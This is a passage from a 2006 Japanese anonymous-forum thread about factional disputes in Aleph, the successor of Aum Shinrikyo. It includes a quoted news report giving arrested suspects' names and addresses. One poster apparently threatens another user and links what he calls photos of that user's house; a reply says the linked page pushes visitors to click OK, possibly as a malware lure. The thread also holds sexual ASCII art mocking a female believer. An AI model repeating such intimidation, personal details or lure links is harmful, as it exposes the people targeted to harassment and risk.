                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 


145 :名無しさん@3周年:2006/08/23(水) 15:38:54 ID:KBthrXmi ?2BP(0)
>>138
少なくとも、本人は警告のつもりだろう。
でも、一般的に警告が警告と解釈されることなんてないでしょ。
だいたい脅しと解釈されちゃうよね。
ただ、脅しというのは、例えば俺の言うことをきかなければ、
俺、または俺の意を受けた誰かがお前を害するぞ、
というのが厳密な意味での脅しだからね。
宗教の警告とは、「迷惑な親切」なのかもしれない。
もちろん、「地獄になんてない」「あの世なんてあるわけない」
などと考えている人が、「地獄に落ちるぞ」といえば、
これは立派な脅しだろうけど、
その人が輪廻を信じているかどうかなんて、
客観的な立証は困難だから、判別もまた困難だね。

でもオウムの人に限っていえば、
信じてもいないことを言って脅すことはしないだろうから、
「迷惑な親切」の方でしょう。

146 :名無しさん@3周年:2006/08/23(水) 15:42:26 ID:Ep1X7Q90
>>145

ふむふむ。
ありがとう。



147 :名無しさん@3周年:2006/08/23(水) 15:55:42 ID:Ep1X7Q90
大物が来たかなって思ったが・・・
そうでもなかったようで

148 :名無しさん@3周年:2006/08/23(水) 16:05:28 ID:Ep1X7Q90
しかし・・
独自の変な真理かあw
少しだけショックだなぁw
もっと勉強しないといけないなあw


149 :名無しさん@3周年:2006/08/23(水) 16:35:25 ID:gdApYBrK
ところでこちらに度々書かれているグルとは
誰のことですが?
麻原さんですか?それともその息子さんたちですか?


150 :名無しさん@3周年:2006/08/23(水) 17:09:05 ID:3c3VUtAe
呼び方によって、

グル、教祖、ソンシ、真理の御霊、シヴァの化身 ・・・・・ 信者
麻原、彰晃、松本、チヅヲ    ・・・・・ 一般人
麻原さん、麻原氏、アーレフの教祖、教祖さん  ・・・・・ オウム贔屓の一般人

だいたいわかるよ。オウム贔屓の一般人さん。

151 :名無しさん@3周年:2006/08/23(水) 17:12:57 ID:3c3VUtAe
麻原被告   ・・・ 一般人か、オウム贔屓

麻原   ・・・・ 上祐などは、上司である麻原を「麻原」と呼び捨てにする場合もある

麻原教祖   ・・・ オウム贔屓の場合が多い

152 :名無しさん@3周年:2006/08/23(水) 17:15:56 ID:Ep1X7Q90
「おっさん」とか「膣汚」とかは?

153 :名無しさん@3周年:2006/08/23(水) 17:21:51 ID:3c3VUtAe
教団工作員か一般人です

154 :名無しさん@3周年:2006/08/23(水) 17:31:38 ID:Ep1X7Q90

ありがとうw

155 :名無しさん@3周年:2006/08/23(水) 19:11:43 ID:gdApYBrK
麻原さんが教祖から開祖に代わった時期がありましたよね。
その時に、麻原さんに代わって、そのお子さんたちを観想するように
変更されたと聞ききました。
それでもグルは麻原さんということなのでしょうか?


156 :20:2006/08/23(水) 19:54:24 ID:2xgt9MlB
>白龍さん

遅れましたが、以下の発言はM派としても間違っていると思いますよ。

「29 :白龍 :2006/08/23(水) 12:14:55 ID:ZMtNeJih
>>27
あなたのステージが、どのようなものなのか分かりませんが、
少なくても、正大師よりは下ですよね?
正大師のステージにあるものが、
深い考えによって、なした行動とはお考えにならないのですか?
よく教団では言いますよね。
ステージの下のものが、ステージの高い成就者の心境を理解できないと。 」

結局これではサリン事件を始めとするヴァジラヤーナ路線の時の教団と何ら違わないですよ。
「何か深い考えがある」「ステージの上の方の考えは私達の常識を越えていると」。
これこそが教団の一番反省すべき点ではなかったのですか?
M派の方はA派とは違うと考えていらっしゃるのでしょうが、実は教団にいる限り
教団の組織に組み込まれている限り、この「上の人の考えは正しい」という推定無罪の法則から抜け出せない。

M派はA派と違うということを強調したいのであろうが、本当の意味では出来やしない。
新しい甘露水にしても、グルのマントラで修法したか、グルのお使いになっていた法具で修法したかの違い。
たったその違いを大げさにアピールしているが、一般社会からしたら同じ「宗教的行為の水」。
あまりにマクロな視点で物事を見ることしかできない正大師こそ原理主義だと思うが。

157 :名無しさん@3周年:2006/08/23(水) 20:11:25 ID:bvUcmC0Y
いいですか、グルはね。方便を説かれていたのです。わかりますか?方便。
ヴァジラヤナとかハルマゲドンはすべて方便であると。それが周囲になかなか理解
されなかったと。悲劇はすべてそこにあると。

158 :名無しさん@3周年:2006/08/23(水) 20:14:35 ID:bvUcmC0Y
妄語(嘘)と方便は違うと。わかりますか?自己の利益の増大が目的ならば
、これは妄語であると。方便は他者の利益の増大を目的としていると。
グルと教団は常に衆生の救済を考えていたと。すなわちこれは方便であると。

159 :名無しさん@3周年:2006/08/23(水) 20:22:03 ID:bvUcmC0Y
アーチャリー正大師が大学の学問をされるのも、
マンションに住まわれるのもすべて方便であると。
なぜなら良い暮らしをすることで、様々なことが経験でき、
、スピーディに衆生の救済につながるからである。原理に
一字一句忠実なだけではいけない、本質を見ると。その為に方便を使うと。

160 :名無しさん@3周年:2006/08/23(水) 20:25:13 ID:dTP0D6zE
サッパミッタ

161 :名無しさん@3周年:2006/08/23(水) 20:35:14 ID:Ep1X7Q90
麻原のおっさんは石垣では「この予言に私の宗教生命を賭けます」と抜かしてたけどそれも方便?

162 :名無しさん@3周年:2006/08/23(水) 20:37:19 ID:Ep1X7Q90
救済すべき衆生をサリンで大量虐殺するのは本末転倒では?

163 :名無しさん@3周年:2006/08/23(水) 20:40:08 ID:Ep1X7Q90
信徒やサマナの良い暮らしを取り上げてはその人たちもいろんな経験ができないのでは?
さらに言うなら今までむしり取っていたからそろそろ毟り取られる番でしょ?カルマ的に
なら黙って取られた方がカルマ落としでよくない?カルマ的に

164 :名無しさん@3周年:2006/08/23(水) 20:40:26 ID:0VvBNyuJ
ID:bvUcmC0Y
バカ再び登場。
今日はよく釣れたみたいだなw

165 :名無しさん@3周年:2006/08/23(水) 20:47:32 ID:Ep1X7Q90
ところで聞きたいなあ。

麻原のおっさんが最終解脱していたって誰が保証してくれるのかな?
オウム・アーレフが真理だって保証は?

誰か納得できるように証明してよ。

166 :名無しさん@3周年:2006/08/23(水) 20:53:45 ID:0vIS4bqf
>61

貴方も物質なんですが、ナニカ
どうする?

言葉が軽いね、物質文明の最たるパソコンを使いながら
ゲームはリセットできるんですが、現世はできないと。

167 :名無しさん@3周年:2006/08/23(水) 21:00:54 ID:F3xM4Z7k
サーヤが15年間成人皇族として公務して、ある意味その給料+退職金でもらえたのが1億5千万。
2chじゃ多分皇室廃止論者男性から「高すぎる!」って言われてたけど、わたしは一生遊んで暮らせるくらい
のお金を上げたかったよ。そのサーヤの持参金を二週間の静養らしき観光旅行で使う兄夫婦。

国民の血税をバ カ ン ス であっというまに使い果たす馬鹿夫婦をどう思いますか?



168 :名無しさん@3周年:2006/08/23(水) 21:28:11 ID:BehQ8NFq
不敬非国民は氏ね!

169 :名無しさん@3周年:2006/08/23(水) 21:31:05 ID:cGbktYZ8

>>100

私はN師からアストラルが汚れるから2ちゃんは見るな!と言われました。

>>56

M派では
おん まいたれや そわか
と唱えてるのですか?



170 :名無しさん@3周年:2006/08/23(水) 21:47:27 ID:grUKgWek
わざわざ見るな、と釘を刺すということは
見られたら困ると、、当然ね


171 :名無しさん@3周年:2006/08/23(水) 21:52:27 ID:Qb9j+LVa
>>115
なんだ〜。
じゃやっぱりさくらが最初に思ったとおり、
お盆のセミナーでエネルギー上がりすぎちゃった
信徒さんなんだ〜(*^^*)

172 :和井 恵:2006/08/23(水) 21:57:33 ID:eAl0WL70
>>157
>いいですか、グルはね。方便を説かれていたのです。
>わかりますか?方便。

おやおや、「マハー・ムドラー」に引き続いて、
また自分たちに「都合のいい言葉」を見つけてきましたか…

>ヴァジラヤナとかハルマゲドンはすべて方便であると。

つまり、最初から「デタラメ」だったんだね。

>それが周囲になかなか理解されなかったと。

「自分勝手」な事をしておいて、理解されると思う方がおかしい。

>悲劇はすべてそこにあると。

(自分たちに)都合のいい解釈なんだね…

173 :和井 恵:2006/08/23(水) 21:58:10 ID:eAl0WL70
>>158
>妄語(嘘)と方便は違うと。わかりますか?

教祖が使ったのは「嘘」の方。

>自己の利益の増大が目的ならば、これは妄語であると。

自分たちの活動資金を増やそうと、必死だったよね。

>方便は他者の利益の増大を目的としていると。

「自分勝手な解釈」の付いた「他者の利益」を、
他者に強引に押しつけようとした。
それで、どれだけ多くの人が被害を被ったことか…

>グルと教団は常に衆生の救済を考えていたと。
>すなわちこれは方便であると。

それを「信じたい」と思っているのは、
教団内部の人間と、一部の信奉者だけでしょうね。
世間に対しては、何の説得力もない言葉だな…


174 :名無しさん@3周年:2006/08/23(水) 22:04:04 ID:grUKgWek
テレクラで商売して、料金延滞した人を恐喝して巻き上げた金
それが、教団のふところに入ったんだぜ?
知らないで、道場経営して、世間の人は凡夫だ、なんて
言っているんだからチャンチャラおかしいわ、、
元出家のくせに、テレクラですからね
で、客のところに恐喝しにいって、しこたま稼いで、布施して
(ああ、すげえ、俺って、こんな布施できた)って
思うような信者さ、、
真理を守るために、役に立ったつもりさ!


175 :名無しさん@3周年:2006/08/23(水) 22:05:30 ID:grUKgWek
変な情報が氾濫しているね、、
漏れは、通勤途中にキヨスクで、スポーツ紙一面にデカデカと
その信者が乗ったのを見たぜ?
風俗店経営兼宝石商、教団の黒幕、数億を教団に寄付した男ってさ

176 :名無しさん@3周年:2006/08/23(水) 22:09:03 ID:grUKgWek
新しく入った人、外の情報を入れない人は、
知らないんだろうけど、金さえ手に入れば
宗教者のくせに! 風俗店経営して荒稼ぎ、もハレンチとも思わずやったのさ、、

そんでその布施でメシ食って、神聖だってよ ケ!

177 :名無しさん@3周年:2006/08/23(水) 22:10:22 ID:grUKgWek
元オウムのテレホンクラブ経営者逮捕
2000.08.06 The SankeiShimbun
 オウム真理教(アレフと改称)元信者の経営するテレホンクラブが、
客から法外な延滞料金を脅し取った事件で、警視庁刑事総務課と本田署は六日まで
に、恐喝の疑いで、経営者の川本禎三(39)=東京都新宿区西新宿六ノ二三ノ一
=と、宝石販売会社社長檜垣誠治(42)=品川区大井五ノ二ノ三=の二容疑者を
新たに逮捕した。事件での逮捕者は計九人となった。

 調べによると両容疑者は新宿区内でテレクラを経営、客が登録申し込みの際、
一日千円の延滞金支払いを約束したことを悪用して一九九八年一月から六月にかけ

、従業員に命じて葛飾区の会社員=当時(33)=と家族に「すぐに払え。
会社に押し掛ける」などと電話をし、計約百二十八万円を脅し取った疑い。

 同店をめぐっては、これまでに七人から同様の手口で計約五百二十万円を脅し取
ったとして従業員ら七人が逮捕されている。また七十九人から被害届が出され、
被害額は計約四千七百万円に上るという。

 公安当局によると川本容疑者は元オウム信者で、かつて教団に数億円のお布施を
するなどしていた。
http://www2.cc22.ne.jp/~hiro_ko/2-16ohmu.html


178 :シヴァの喜び:2006/08/23(水) 22:14:23 ID:Ep1X7Q90
変な真理でも吹聴するかなw

ヴァジラヤーナを方便とはw
密教では最も優れた教えであるとされる秘密金剛乗も形無しですなあw


179 :名無しさん@3周年:2006/08/23(水) 22:21:58 ID:Qb9j+LVa
あ〜。
そういえば、友達からテレクラのバイトしない?って誘われたな。
電話でお話しするだけって言ってたけど・・・。
どんなお話したらいいかわかんないし、ちょっとキモイ感じがしたから
やんなかったけど。

その後そのこのうちに遊びに行ったら、オウム本が一杯あったっけ。

また別のある日、その子が持っている宝石を売るんだとかいって、
宝石やさんに来てもらってたっけ。

なるほど、すべてオウムつながりか〜。

で、あの時来てた人がもしかしたら
>>177の人なのかも。


180 :名無しさん@3周年:2006/08/23(水) 22:31:33 ID:grUKgWek
179
やけに軽いノリだな、本当かね

181 :179:2006/08/23(水) 22:33:40 ID:Qb9j+LVa
全部ホントなんだけど・・・。

182 :名無しさん@3周年:2006/08/23(水) 22:35:10 ID:Ep1X7Q90
特定の人の発言を見えないようにするってこと可能なのかな?
教団の方と思われる方は俺の発言スルー、無視するようになった感じがするがw



183 :シヴァの喜び:2006/08/23(水) 22:35:51 ID:Ep1X7Q90
>>182は俺ですw

184 :名無しさん@3周年:2006/08/23(水) 22:37:11 ID:ex9GR+Dt
入信希望の貧乏な若い女の子を、
借金させて風俗で働かせて持っている貴金属は売らせて
その金でサリンを製造し、信者の若い女の子と
セックスやりまくっていたとは思いもしなかっただろう

185 :名無しさん@3周年:2006/08/23(水) 22:48:30 ID:W5bId51B
オヤジたちの精子を出させて
布施のための金を稼がせ、
飯を食っている
世界一神聖な団体です

186 :名無しさん@3周年:2006/08/23(水) 23:02:56 ID:I4AuqAdC


187 :名無しさん@3周年:2006/08/23(水) 23:13:43 ID:VSAn93DG
( ^ω^)http://m-pe.tv/u/page.php?uid=dmjgdmjgdmjg&id=4

188 :白龍:2006/08/23(水) 23:19:19 ID:ZMtNeJih
帰宅しました。書き込みすごいですね。
A派の方の書き込みが増えたのは、
内部の事情が、何か関係しているんでしょうか。
A派でも、2チャンネルを見出した信徒が増えたか、
サマナが覗きだしたかと言ったところかな。

今日地元の警察が、我が家に様子伺いにみえたらしいが、
寝てたので、母が対応してくれていたらしい。
警察の方が言うのには、アーチャリー派と上祐派で、
信徒の獲得に躍起になっているらしいので、
息子さんにも、気をつけるようおっしゃってくださいと、言い残していったらしい。
この辺の事情が、2チャンネルの書き込みにも影響を与えているのかもしれませんね。

189 :シヴァの喜び:2006/08/23(水) 23:26:42 ID:Ep1X7Q90
白龍さん

>>188

>信徒の獲得に躍起になっているらしいので、

もうお金が底をつき始めてるのかなぁ?



190 :名無しさん@3周年:2006/08/23(水) 23:30:14 ID:ECQosVYD
http://osaka.aleph.to/profile/index.html
大阪にナンダカ師?
水戸の後任は?
ジェーンティー師、サマンタバドラ師はどこへ?


191 :↓キモデブ女信者の密かな楽しみ:2006/08/23(水) 23:40:44 ID:F3xM4Z7k
                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | キョ、教祖様ーー
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 

192 :↓キモデブ女信者の密かな楽しみ:2006/08/23(水) 23:41:17 ID:F3xM4Z7k
                   /   ノノ ノノノ ヾヽ、ヽ
               /   ノj `      ´ i | キョ、教祖様ーー
               i    {   ` , ,-,、´  i | ア、アア、アアアアーーーイクーー
              {    i     )-―-'(  i |    
                 ヽ   i     ⌒   } |_,,,. -‐- 、  
              __)), ,ノ人   、_,  ノ''"´   ,      \ 
                /       ` ー--,. '´   . : :`(      ゝ、
               /           : : :: :´: .         : :\ , ' ´_   ヽ
           /  r´: :       : : : :       ,. ' ´ ヽ>'´    ,'ヽ!
             / γ: :        ノ    _   ,, 、,, ,,__i  。 ./       ; ,!
           i   ir' " ヽ    ,,, ''' ´         `"7         :/ 
         i  |、 ° }, '                 ` y'         /
   "'''‐‐- ...,,,_|   ヽ、ー/           __    _/          /
             `'''-,,,て          ´    ̄ ̄ /          ,イ 
             `''-、__/            /    `  / ,!    _,
                     `''-,,_     ,..、_,,..イ´      i'´  `ゝ''"´
                    \_ ,,,,,...ゞ、_           |ー-/  
                           ミ〉       !r'´
                         ヽ   ミ/、 /|  i  i } 

193 :白龍:2006/08/23(水) 23:43:17 ID:ZMtNeJih
>>156
>「何か深い考えがある」「ステージの上の方の考えは私達の常識を越えていると」。
>これこそが教団の一番反省すべき点ではなかったのですか?

返事が遅れて済みませんでした。
これは、あなたのおっしゃる通りです。
でも、A派の方を説得するためには、相手が理解しやすい法則を使ったほうが、
分かりやすいだろうと思い、このような表現をしました。
私は、今回の分裂騒動で、出家者がステージを全くないがしろにしているのを見て、
今までの観念が、完全に崩壊しました。
もう、どのステージも私は認めません。例え正大師であってもです。
ですから、前にも書きましたが、私は懐疑的なのです。
M派では、ステージ制を廃止すると言ってますから、
すみやかに、廃止をして欲しいと願っています。

>新しい甘露水にしても、グルのマントラで修法したか、グルのお使いになっていた法具で修法したかの違い。
>たったその違いを大げさにアピールしているが、一般社会からしたら同じ「宗教的行為の水」。

そうなんです。布施にしても、このような修法に関しても、
以前の方法から、どうしても抜け出せないものがいろいろある。
だから、どこが改革の目玉なんだと言いたくなる。
今は過渡期だから、仕方がないのだと、
私自身も、自分に言い聞かせているところもありますが、
今後のM派の推移は、注意深く見守りたいと考えています。

194 :白龍:2006/08/23(水) 23:47:43 ID:ZMtNeJih
>>189
赤字経営だと思いますよ。
古い信徒は、お金ないですから。
ある一部のお金持ち信徒が、がんばっているか、
財施部のサマナが、がんばっているんでしょうね。

195 :名無しさん@3周年:2006/08/23(水) 23:48:15 ID:M40x0rDq
結局、尊師を隠すだけで、じょうゆう教とA派は、かわりない

196 :名無しさん@3周年:2006/08/23(水) 23:51:25 ID:cGbktYZ8
>>190

サマンタバトラー師は大阪にいますよ。
ジェーンティー師は体調を崩されて長期修行に入られているそうですが、師から電話があっても出るなと言われてます。体調を崩されてるだけなら、こんな指示はないと思うんだけど、情報がないので…。



197 :白龍:2006/08/23(水) 23:57:23 ID:ZMtNeJih
>>195
そう言われることに対して、
明確に反論できるような、M派であってほしいと思っています。

198 :名無しさん@3周年:2006/08/23(水) 23:58:24 ID:grUKgWek
いや、サマージャンボでもドカンと三本くらいあたったら
どっちも信者獲得なんか燃えない、、

三本でも足りないか

199 :名無しさん@3周年:2006/08/24(木) 00:00:04 ID:ECQosVYD
分裂はアーチャリー正大師とマイトレーヤ正大師のケンカが原因なんでしょ?


200 :名無しさん@3周年:2006/08/24(木) 00:27:50 ID:iGwWu2an
 
辞めてから思った。オウムにいたときはあまりにもいろんな
物事に対する決め付けが大杉て、頑固親父のように思考が
凝り固まっていた。辞めてからいろんな人たちの話を聞いて
なんて自分は小さい世界の中で悟ったような気になっていたかと
恥ずかしくて仕方がなかった。 
 

201 :名無しさん@3周年:2006/08/24(木) 01:20:34 ID:644zOpuZ
ガチガチのキリスト教原理主義
◆IbYG6dQTTc ←こいつのことだろう

202 :名無しさん@3周年:2006/08/24(木) 01:46:36 ID:Bpx1yU8n
vt正悟師のこといぢめないでね。
タントラデュパさん辞めたってほんとですか?

203 :20:2006/08/24(木) 06:53:11 ID:G8TACm6P
>白龍さん
M派の一番いけない部分は言ったことをなかなか実行しない点だと思いますね。
ステージ制度・ホーリーネームの廃止にしても言ったは良いが、実行出来ない。
何よりも正大師とお側にいる方々に都合が良くないと実行されない。
改革するなら成就者方が財施しないとダメでしょ。赤字ならなおさら。

このままではM派はA派に対する対抗心を持つ者のみが残る小規模なグループに成り下がると思いますね。
事実、M派活動からの離脱者って多いですよね?

204 :阿佐谷北(本物) ◆Kcjlum1seI :2006/08/24(木) 07:42:53 ID:HUDrh/UH
亀レス失礼。

>>14
> それはA派のことですよね。M派は広く門戸を広げ、他者否定はいけない
>と教えてる
 M派はそうらしいですね。
 でも今まで教団の>>13の様な状態を放置しておいて「今更改革ですか?」というのが、今の私の正直な意見です。
 素直に賛同出来なくて申し訳有りませんね。

>>16
>今はもう、純粋に教祖帰依を打ち出す者以外は、
>排除する傾向が、より強くなっているようです。
>
 A派はグルの唱えた四無量心を実践していない時点で、「純粋に教祖に帰依をしている」とは到底言えませんよね。
 師や正悟師のレベルであっても、平然とウソをついたりするとも聞きました。
 真理の実践者を自称するなら、最低限、基本的な「十の戒律」くらいは守って頂きたい物ですね。

>正悟師でも例外ではないようなので、
>少々末期的かと感じています。
>
 私から言わせれば、「まさにカルマが帰ってきた」としか言い様がありませんな。



205 :白龍:2006/08/24(木) 09:43:08 ID:MMe3eGCG
>>203
20さんのおっしゃる通りだと思います。
私の思っていることを、的確におっしゃっていただいたような気がします。
ただし、上祐さんも、9月ころから動き出すと言うようなことを、
以前におっしゃっていたので、来月あたりからなんらかの動きがあるのかなと、
期待はしているんですけどね。

>何よりも正大師とお側にいる方々に都合が良くないと実行されない。
20さんは、現実的に、このような状況を目の当たりにされているのでしょうか?
あるいは、どなたかから、聞き及んでいるのでしょうか?
もし、実際そのような状況だとすると、自分達に都合の良いグループに、
こじんまりと収まりそうで、あまり改革の意味がないような気がしますね。

>このままではM派はA派に対する対抗心を持つ者のみが残る小規模なグループに成り下がると思いますね
このように、ならないことを切に望みます。

>改革するなら成就者方が財施しないとダメでしょ。赤字ならなおさら。
実際赤字かどうかは、会計報告されていないんで分かりませんが、この意見にも賛成です。

>事実、M派活動からの離脱者って多いですよね?
これは、離脱者がどの程度なのか分かりませんので、なんとも言えないです。
信徒は、そんなに離れていないと思いますが、
サマナは、信徒と見ている観点が別なので、離れる人が多いのでしょうか?
20さんは、どの程度把握されているのですか?

206 :白龍:2006/08/24(木) 09:48:24 ID:MMe3eGCG
>>204
>真理の実践者を自称するなら、最低限、基本的な「十の戒律」くらいは守って頂きたい物ですね。
本当にそう思います。


207 :名無しさん@3周年:2006/08/24(木) 10:49:15 ID:qY4Yheop
もどきは、一度マイちゃんはAに戻るだろうと
んで、今度出てくるときは失意でやめるときだが、
外国へ行くと、、ひとりで雲隠れというかセンチメンタルジャーニーの
つもりが、おっかけがきて、結局なんらかの団体を形成するだろうと、、

結局のところ、彼は失望していると
何にって、自分が以外に人気がないということ
やはり、弟子は教祖の弟子であったと、痛感している
だから動けない
自分の改革を推し進めると、Mの中の大多数を失うから
少人数すぎて何もできない 金も当然ない


208 :名無しさん@3周年:2006/08/24(木) 10:58:41 ID:ctawRnn9
キャンディ、起きたかw
あんた許さんよ。

209 :名無しさん@3周年:2006/08/24(木) 10:58:57 ID:qY4Yheop
すでに男どもの、権力争いの域にあるのであって
両派とも、真理の実践団体ではないのかもしれん

言っても仕方ないが、こんな少人数になってしまってから割れるんでは
どう分裂しても数が少なすぎる
もっと、早くに決断してくれれば、マイにもついていく人がいたかもね、、
だって、より純化された金剛ヴァカばかり残っているのだもの
これだけ叩かれても教祖についていくって奴ばかりが残ったのに
そこから、教祖を捨てて俺についてこい、って言ってもねえ、、

210 :名無しさん@3周年:2006/08/24(木) 11:02:12 ID:ctawRnn9
仕事しろw














211 :名無しさん@3周年:2006/08/24(木) 11:04:39 ID:qY4Yheop
何が許さんのだ
この教団の隠蔽体質ってのが大嫌いだ
なんでも公明正大にしておけば、ウソついたりばれないか
ハラハラしながら生きなくても良かったのだ
なんで、やってはいかんということばかり、やりながら存続せねばならないのかね
教祖って変態趣味だよ

212 :名無しさん@3周年:2006/08/24(木) 11:05:29 ID:ctawRnn9
極限修行は楽しい 極限修行は楽しい
極限修行は楽しい 極限修行は楽しい
日々の修習怠らず 日々の捨断頑張って
(全力で!!) 必ず解脱するんだ (手を抜くな!!) 必ず成就するんだ
*チャンスはないぞ!
極限修行はチャンス 極限修行はチャンス
(頑張って)
ワークの結果がやって来た 功徳の結果がやって来た
必ず解脱するんだ 必ず成就するんだ
*(手拍子ぽぽん ぽん ぽぽん ぽん)それ!
 (手拍子ぽぽん ぽん ぽぽん ぽん)手を抜くな!

213 :名無しさん@3周年:2006/08/24(木) 11:06:58 ID:ctawRnn9


いつも見てるぞ!(グルは)

214 :名無しさん@3周年:2006/08/24(木) 11:08:27 ID:qY4Yheop
なにがミカン箱の中のミカンは
腐ってないように見えても腐っている、だ
自分のところのミカン箱は腐敗臭がしてハエがたかっているのに
政治に打って出ようとしたというのも、なにをかいわんや、、てか

間違っていることとは、徹底的に戦うとかさ
何の話していたんだっけ?
あの人にそんなことほざく資格があったのかね?
聖職者のくせに、、あまりにも簡単に、世の中の規律も、仏教の戒も
破りすぎる

215 :名無しさん@3周年:2006/08/24(木) 11:09:37 ID:ctawRnn9




私これ食べる!!!

216 :名無しさん@3周年:2006/08/24(木) 11:11:48 ID:4heaV/z1
>>213

拘置所の中であらぬところ見つめながら自分の肉棒しごいてな。何を見てるんだか・・・

217 :名無しさん@3周年:2006/08/24(木) 11:14:02 ID:ctawRnn9
キャンディのお家の写真w
すぐ消しちゃうよ
http://www15.plala.or.jp/ookamigoya/0_100km.htm

218 :名無しさん@3周年:2006/08/24(木) 11:16:05 ID:ctawRnn9


なつまでまつな

219 :白龍:2006/08/24(木) 11:17:49 ID:MMe3eGCG
>>207>>209
A派には行かないと思うけど、
もどきの予言は、案外当たっているかもしれないね。
上祐さんも、この際インドかヒマヤラ辺りに行って、
向こうの師匠について、最終解脱向けて修行してくればいいんじゃないだろうか。

うまいこと最終解脱したなら、自分がグルになって、
イニシエーションも出来るようになるし、
いつまでも、教祖に縛られた形を維持しなくてもいいと思う。
教祖を超えられなくても、同じレベルに並べばいいわけだし、
最初から、最終解脱は無理とあきらめず、挑戦してみてほしいです。

出家者はみんな、最終解脱するために、修行しているわけだろうし、
一番最終解脱に近い人が、目標に達すれば、
次を目指す人にも、良い道しるべになると思う。
上祐さんが、本当に真理を残したいなら、
自分が、グルになって真理を残すしか手がないような気がするんだけどねえ。

220 :白龍:2006/08/24(木) 11:25:17 ID:MMe3eGCG
>>217
また変なの貼り付けてますね。
飛んでいくと、2チャンネルにURL貼ったのは君か?
とか出てきて、OK押さないと画面が変わらないようになっている。
私は、押したくないので、強制的に電源落としてしまったが、
OK押すとどうなるんだろう。
ウイルス感染?それとも個人情報抜き取られる?











221 :名無しさん@3周年:2006/08/24(木) 11:28:19 ID:6rRrhVJa
>220
なんかサマナもおかしくなった奴が続出してますな

222 :名無しさん@3周年:2006/08/24(木) 11:30:19 ID:6rRrhVJa
>208
大体あんたが許すとか許さんとかそんな権限あるの?
そんな教義あったか?

223 :名無しさん@3周年:2006/08/24(木) 11:35:19 ID:qY4Yheop
裏で何をやったか、知らないでこのグルについていくと
ひどい悪行をつまされるじゃないか、、

上長は気軽にこれやって、と
はいがんばりますと それが、世俗の人や自分の仲間を危険にさらすことに
つながっていたら、ワークしているつもりが、悪行積んでいるのかもしれない


224 :名無しさん@3周年:2006/08/24(木) 11:36:36 ID:qY4Yheop
221 サマナの頭が?サマナのパソコンが?

225 :名無しさん@3周年:2006/08/24(木) 11:37:08 ID:ctawRnn9
目には目を










歯には歯を

226 :名無しさん@3周年:2006/08/24(木) 11:38:20 ID:4heaV/z1
>>219

マイトさんが最終解脱したとしても無理なんじゃない?
あの教団は麻原のおっさんを神・ただ一人の王として見ているから、なんでもかんでも無理やりに「グルのお陰」に還元してしまうからねえ。
同じレベルに肩並べても無理なんじゃない?
それに向こうの師匠についたとしても今持ってる知識や教義を全て捨てないとそれが邪魔して解脱なんか無理でしょ。
あるリンポチェが「オウムの教義は解放への道ではない。あれはグルという名の独裁者に従う奴隷の道だ。従う限り解放はあり得ない」って
言ってましたね。



227 :名無しさん@3周年:2006/08/24(木) 11:39:19 ID:ctawRnn9
今こそ返ってくる!!!!
清算をする時がきた!

228 :名無しさん@3周年:2006/08/24(木) 11:41:23 ID:qY4Yheop
だから、自分たちはメーソンに襲われている、だから世間はひどい奴らだから
自分らも、歯には歯を、でいいいと、思ってやってきたわけでしょ

メーソンになんか、襲われていないってのが、わかったら?
それどころか、グルの指示で、ある弟子がある弟子を騙すわけでしょう?
たとえば、早川や井上はグルの指示で炭素菌まいたと
で、他の場所でも、サマナをターゲットにして、ばい菌撒いたと
吸い込んで具合悪くなったと
ああ、本当にメーソンは自分らを襲ってきているんだ!と
警察憎い、世間が憎い、と、、
でも、本当は、教祖や実行犯など、自分らの仲間が自分らをだましうちに
したんじゃないか!!
その歯は、どこへ向けるべきなんだ?

229 :名無しさん@3周年:2006/08/24(木) 11:44:20 ID:ctawRnn9
この世に生まれ落ちたときは、不自由である。
一人でものを食べることもできない。
大小便も垂れ流しである。
そして、少し成長すると、次は、行動の自由を、父母によって、あるいは兄弟によって奪われる。
「それをやっちゃだめよ、あれをやっちゃだめよ、これをやっちゃだめよ」
これが私の人生のスタートである。
そして、少しずつ少しずつ、活気のある純粋な私の心は、閉ざされていく。
早い人では、3歳くらいから、遅い人でも、小学校に入るくらいから、習い事がはじまる。
こんな習い事をやったって、来世に持っていける訳がない。
単に一つの観念を植え付けるだけである。
そして私はまた、貴重な考える時間を失なってしまった。


230 :名無しさん@3周年:2006/08/24(木) 11:46:38 ID:4heaV/z1
っていうかメーソン(ほんとにそんな団体、オカルト雑誌にでも出てきそうな陰謀団体があったとして)
にしてみれば麻原が「メーソンに攻撃されている!」って言われた時「ハアッ?!」って感じだったろうなw

231 :名無しさん@3周年:2006/08/24(木) 11:46:45 ID:qY4Yheop
思い出すんだ、教祖は私はメーソンに狙われていると、、しきりにいったが
目撃情報なんかひとつもないって事をね!
メーソンに狙われているという”噂”が流れ、
実際体調を崩す者が現れたが、それらは、実行犯が自分らがやったと
自供している

あんたたち、サリン事件が、でっちあげというなら
同じレベルで、教団の話も疑わしい、ってことに思い至りなさいよ

弟子同士で、だまし討ちをしあって、これでいいんだ、って団体だよ
どう解釈して、そこに留まれるんだ?

232 :名無しさん@3周年:2006/08/24(木) 11:48:31 ID:ctawRnn9
これからお邪魔してもいいかね?どうだこれは?

233 :名無しさん@3周年:2006/08/24(木) 11:49:53 ID:ctawRnn9
キャンディの解釈自体がでっちあげ、違うか?

234 :名無しさん@3周年:2006/08/24(木) 11:49:57 ID:4heaV/z1
ctawRnn9はサマナ?

もうそんな攻撃飽きたからもっと面白いことやってよ



235 :名無しさん@3周年:2006/08/24(木) 11:51:53 ID:4heaV/z1
>>233
